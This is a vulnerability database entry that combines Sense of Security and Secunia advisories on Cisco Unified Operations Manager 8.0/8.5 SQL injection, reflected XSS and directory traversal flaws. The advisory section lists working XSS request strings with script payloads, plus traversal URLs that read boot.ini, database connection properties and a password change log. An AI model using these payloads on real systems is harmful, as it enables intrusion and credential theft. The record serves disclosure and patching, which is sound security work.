ID

VAR-201105-0047

CVE

CVE-2011-0960

TITLE

Cisco Unified Operations Manager In SQL Injection vulnerability

DESCRIPTION

Multiple SQL injection vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to execute arbitrary SQL commands via (1) the CCMs parameter to iptm/PRTestCreation.do or (2) the ccm parameter to iptm/TelePresenceReportAction.do, aka Bug ID CSCtn61716. In addition, the blind variables of the CCM variable of TelePresenceReportAction also have a single quote to trigger this vulnerability. An attacker can exploit a vulnerability to obtain sensitive information or manipulate a database. This issue is tracked by Cisco Bug ID CSCtn61716. Check for phrases. Sense of Security - Security Advisory - SOS-11-006 Release Date. 18-May-2011 Last Update. - Vendor Notification Date. 28-Feb-2011 Product. Cisco Unified Operations Manager Common Services Framework Help Servlet Common Services Device Center CiscoWorks Homepage Note: All of the above products are included by default in CuOM. Platform. Microsoft Windows Affected versions. CuOM 8.0 and 8.5 (verified), possibly others. Severity Rating. Medium - Low Impact. Database access, cookie and credential theft, impersonation, loss of confidentiality, local file disclosure, information disclosure. Attack Vector. Remote with authentication Solution Status. Vendor patch (upgrade to CuOM 8.6 as advised by Cisco) CVE reference. CVE-2011-0959 (CSCtn61716) CVE-2011-0960 (CSCtn61716) CVE-2011-0961 (CSCto12704) CVE-2011-0962 (CSCto12712) CVE-2011-0966 (CSCto35577) Details. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network. and a directory traversal vulnerability. 1. Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716): /iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fb e43447 /iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC apability=deviceCap /iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c 06d&deviceCapability=deviceCap /iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870 d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851 8961028 /iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script> 09520eb762c&dojo.preventCache=1298518963370 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3b alert(1)//608ddbf972 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3ba lert(1)//79877affe89 /iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae 4c /iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7 Reflected XSS vulnerability that affect Common Services Device Center CVE-2011-0962 (CSCto12712): /CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc tionhomepage61a8b"%3balert(1)//4e9adfb2987 Reflected XSS vulnerability that affects Common Services Framework Help Servlet CVE-2011-0961 (CSCto12704): /cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251a aad=1 3. Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577): http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini cmfDBA user database info: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope rties DB connection info for all databases: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper ties Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example. DB password change log: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log Solution. Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes. Discovered by. Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the countries largest organisations. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: info@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php . ---------------------------------------------------------------------- http://twitter.com/secunia http://www.facebook.com/Secunia ---------------------------------------------------------------------- TITLE: Cisco Unified Operations Manager Cross-Site Scripting and SQL Injection Vulnerabilities SECUNIA ADVISORY ID: SA44597 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44597/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44597 RELEASE DATE: 2011-05-20 DISCUSS ADVISORY: http://secunia.com/advisories/44597/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44597/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44597 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Unified Operations Manager, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 2) Input passed via various parameters to multiple scripts is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Examples: http://[host]/iptm/advancedfind.do?extn=[code] http://[host]/iptm/ddv.do?deviceCapability=deviceCap&deviceInstanceName=[code] http://[host]/iptm/eventmon?viewname=device.filter&operation=getFilter&cmd=[code] http://[host]/iptm/eventmon?cmd=getDeviceData&group=[code] http://[host]/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=[code] http://[host]/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=[code] http://[host]/iptm/logicalTopo.do?ccmName=[code] http://[host]/iptm/logicalTopo.do?clusterName=[code] 3) Input passed via the "tag" parameter to CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine in Common Services Device Center is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in versions 8.0 and 8.5. SOLUTION: Updated to version 8.6. PROVIDED AND/OR DISCOVERED BY: Sense of Security Labs ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=23085 http://tools.cisco.com/security/center/viewAlert.x?alertId=23086 http://tools.cisco.com/security/center/viewAlert.x?alertId=23087 Sense of Security Labs: http://www.senseofsecurity.com.au/advisories/SOS-11-006 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

SQL injection

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Sense of Security

SOURCES

LAST UPDATE DATE

2025-04-11T22:54:01.999000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE